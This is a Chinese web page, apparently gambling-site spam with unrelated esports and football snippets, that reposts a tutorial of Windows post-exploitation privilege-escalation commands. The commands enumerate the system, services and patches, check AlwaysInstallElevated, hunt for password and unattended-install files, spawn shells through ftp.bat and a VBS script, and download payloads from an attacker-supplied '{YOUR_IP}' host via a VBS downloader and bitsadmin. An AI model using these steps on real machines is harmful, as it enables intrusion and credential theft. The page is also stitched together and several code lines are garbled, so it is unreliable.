平博娱乐-拳头游戏宣布LJL赛区将并入PCS,不再拥有单独的MSI和S赛名额

admin 2025-08-08 阅读:14 评论:0
  这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。  1   获取操作系统信息   识别操作系统名称及版本:  C:Usersthel3l> systeminfo...

  这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。

  1

  获取操作系统信息

  识别操作系统名称及版本:

  C:Usersthel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

  OS Name: Microsoft Windows 10Pro

  OS Version: 10.0.14393N/A Build 14393

  当然中文系统你得这样:

  systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

  识别系统体系结构:

  C:Usersthel3l> echo %PROCESSOR_ARCHITECTURE%

  AMD64

  查看所有环境变量:

  C:Usersthel3l> SET

  USERNAME=thel3l

  USERPROFILE=C:Usersthel3l

  *snip*

  查看某特定用户信息:

  C:Usersthel3l>net user thel3l

  User name thel3l

  *snip*

  The command completed successfully

  2

  获取网络信息

  查看路由表信息:

  C:Usersthel3l> route print

  查看ARP缓存信息:

  C:Usersthel3l> arp -A

  查看防火墙规则:

  C:Usersthel3l> netstat -ano

  C:Usersthel3l> netsh firewall show config

  C:Usersthel3l> netsh firewall show state

  3

  应用程序及服务信息

  查看计划任务:

  C:Usersthel3l> schtasks /QUERY /fo LIST /v

  中文系统的命令,先调整GBK编码为437美国编码:

  chcp 437

  然后

  schtasks /QUERY /fo LIST /v

  查看服务进程ID:

  C:Usersthel3l> tasklist /SVC

拳头游戏宣布LJL赛区将并入PCS,不再拥有单独的MSI和S赛名额

  查看安装驱动:

  C:Usersthel3l> DRIVERQUERY

  查看安装程序和版本信息(漏洞利用线索):

  C:Usersthel3l> wmic product list brief

  查看服务、进程和启动程序信息:

  C:Usersthel3l> wmic service list brief

  C:Usersthel3l> wmic process list brief

拳头游戏宣布LJL赛区将并入PCS,不再拥有单独的MSI和S赛名额

  C:Usersthel3l> wmic startup list brief

  查看.msi程序的执行权限:

  C:Usersthel3l> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

  C:Usersthel3l> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

  查看是否设置有setuid和setgid:

  C:Usersthel3l>

  reg query HKEY_Local_MachineSystemCurrentControlSetServicesNfsSvrParametersSafeSetUidGidBits

  查看安装补丁和时间信息:

  C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn

  查看特定漏洞补丁信息:

  C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

  4

  敏感数据和目录

  查找密码文件或其它敏感文件:

  C:Usersthel3l> cd/

  C:Usersthel3l> dir /b/s password.txt

  C:Usersthel3l> dir /b/s config.*

  C:Usersthel3l> findstr /si password *.xml *.ini *.txt

  C:Usersthel3l> findstr /si login *.xml *.ini *.txt

  无人值守安装文件:

  这些文件通常包含模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:

  C:sysprep.inf

  C:sysprepsysprep.xml

  C:WindowsPantherUnattendUnattended.xml

  C:WindowsPantherUnattended.xml

  5

  文件系统

  可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下:

  import os; os.system("cmd /c {command here}")

  使用copy con命令创建ftp执行会话:

  范例

  C:Usersthel3l> copy con ftp.bat#创建一个名为ftp.bat的批处理文件

  ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出

  C:Usersthel3l> ftp.bat# 执行创建的文件

  ftp> # 执行ftp命令

  ftp> !{command}# e.g. - !dir or !ipconfig

  使用copy con命令创建VBS脚本文件:

  C:Usersthel3l> copy con commandExec.vbs #创建VBS脚本文件

  Call W.CreateObject("W.Shell").Run("cmd /K {command}", 8, True) #VBS文件内容

  C:Usersthel3l>commandExec.vbs #执行脚本文件

  检查文件夹可写状态:

  C:Usersthel3l> dir /a-r-d /s /b

  6

  一个有用的文件上传脚本

  ' downloadfile.vbs

  ' Set your settings

  strFileURL = "https://{YOUR_IP}/{FILE_NAME.EXT}"

  strHDLocation ="c:{FILE_NAME.EXT}"

  ' Fetch the file

  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

  objXMLHTTP.open "GET", strFileURL, false

  objXMLHTTP.send()

  If objXMLHTTP.Status = 200 Then

  Set objADOStream = CreateObject("ADODB.Stream")

  objADOStream.Open

  objADOStream.Type = 1 'adTypeBinary

  objADOStream.Write objXMLHTTP.ResponseBody

  objADOStream.Position = 0 'Set the stream position to the start

  Set objFSO = Createobject("ing.FileSystemObject")

  If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

  Set objFSO = Nothing

  objADOStream.SaveToFile strHDLocation

  objADOStream.Close

  Set objADOStream = Nothing

  End if

  Set objXMLHTTP = Nothing

  该脚本是一个社区发布的,你可以以下这种方式运行它:

  C:Usersthel3l>c.exe downloadfile.vbs

  bitsadmin命令:

  如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程:

  范例

  C:Usersthel3l> bitsadmin /transfer job_name /download /priority priority URL localpathfile

  C:Usersthel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}

  C:UsersusernameDownloads{FILE_NAME.EXT}

  如:

  bitsadmin /transfer n https://download.fb.com/file/xx.zip c:pentestxx.zip

  来源:https://www.freebuf.com/articles/system/114731.html

  

  “炼石杯”网络空间安全技能大赛

  以赛促学、以技会友

  更有诸多大奖等你拿

  详情咨询QQ群:478091920

版权声明

本文仅代表作者观点,不代表百度立场。
本文系作者授权百度百家发表,未经许可,不得转载。

分享:

扫一扫在手机阅读、分享本文

发表评论
热门文章
  • 平博体育-意甲球队备战重要比赛,全队士气高昂

    平博体育-意甲球队备战重要比赛,全队士气高昂
    阿根廷2022夺冠的可能性很高,现在的阿根廷男子足球队是一支实力比较强劲的球队,在今年的世界杯比赛之前,阿根廷足球队针对世界杯的比赛也做出了各种各样的准备工作,预防在比赛中出现各种问题,从阿根廷足球队的目前阵容来看,在今年的世界杯中夺冠的可能性非常的高梅西作为阿根廷足球队的核心球员也是阿根廷;罗马城是疯狂的,都灵城却是落寞的,除了意甲和欧冠双线失利,安切洛蒂执教球队在意大利杯中也被巴乔领衔的布雷西亚淘汰,在安帅执教尤文图斯两年的时间里,“斑马军团”总共拿到144分,获得两次联...
  • 平博娱乐-委内瑞拉队在足球比赛中强势登顶

    平博娱乐-委内瑞拉队在足球比赛中强势登顶
    20031109 委内瑞拉 03 03 阿根廷 20031106 阿根廷 22 20 智利 阿根廷队预选赛射手榜 克雷斯波 7 里克尔梅 3 菲格罗阿 3 艾马尔 3 索林 2 两球以下从略 阿根廷国家队简介 从历史战绩来看,巴西阿根廷以及乌拉圭在南美足坛成三足鼎立之势,只是近年来乌拉圭足球日渐势微,唯有。 在最新的南美世预赛积分榜中,乌拉圭队凭借出色的表现成功登顶他们在最近的一场比赛中以32险胜哥伦比亚队,这场胜利也为他们带来了宝贵的3分,使得他们的总积分达到了19分与此...
  • 平博体育-波尔多客场战平亚眠,积分榜上升的简单介绍

    平博体育-波尔多客场战平亚眠,积分榜上升的简单介绍
    包括了11战平联赛前列份子里奥阿维朴迪莫伦斯到目前为止11 目前的积分榜上,雷恩高居第3位亚眠是法甲联赛的下游弱旅。 无出战成疑无球队新闻悉尼FC距离积分榜第二位只有1分之差此前球队客场22战平中央海岸水手,已经累计3连平宁科维奇和布。 双方在加时赛上依然战平,最终通过互踢点球缓解,大田地铁淘汰 仅以2分排在积分榜的第9位,但他们客场战斗力不容小觑,上轮面。 目前暂列积分榜第七位其实勒沃库森上一场客战多特蒙德踢得并 自从作客战平波尔多后他们状态也有回升的迹象,近3场联赛当中...
  • 平博中国官网-关于瓦伦西亚迎来与比利亚雷亚尔的生死对决的信息

    平博中国官网-关于瓦伦西亚迎来与比利亚雷亚尔的生死对决的信息
    1、北京时间10月18日2200,西甲联赛第6轮的比赛展开了一场争夺,由比利亚雷亚尔队对阵瓦伦西亚队由于两队都是争四级别的球队,因此这是一场西甲劲旅之间的直接对话结果在这场较量中,主场作战的比利亚雷亚尔队表现出色,他们在第6分钟时就由帕科打进了一粒点球此后,虽然瓦伦西亚队这边由格德斯破门,率。 2、西甲比赛中,2012年5月13日,皇家社会以10领先瓦伦西亚,上半场结束时是00平局5月6日,瓦伦西亚10战胜比利亚雷亚尔,半场双方战成005月3日,瓦伦西亚以40大胜奥萨苏纳,上...
  • 平博娱乐-包含欧洲锦标赛:切尔西绝杀取得关键胜利的词条

    平博娱乐-包含欧洲锦标赛:切尔西绝杀取得关键胜利的词条
    利物浦在主场终于取得了胜利,结束了连续六场比赛不胜的尴尬纪录他们在安菲尔德以3比1逆转击败对手,其中萨拉赫和阿诺德发挥了关键作用随着主场不胜的魔咒被打破,利物浦在剩余的比赛中只剩下曼联一个强敌,他们在争夺前四的比赛中仍然占据有利地位莱斯特城和西汉姆联在本轮相遇,对于利物浦和切尔西来说。 举几个鲜明的例子,200203赛季尾声,在斯坦福桥,切尔西21战胜利物浦LIVERPOOL FC,取得了联赛第四名,获得了第二年的欧冠参赛资格,其中格伦夏尔帮助球队打入了一粒关键的进球,同时...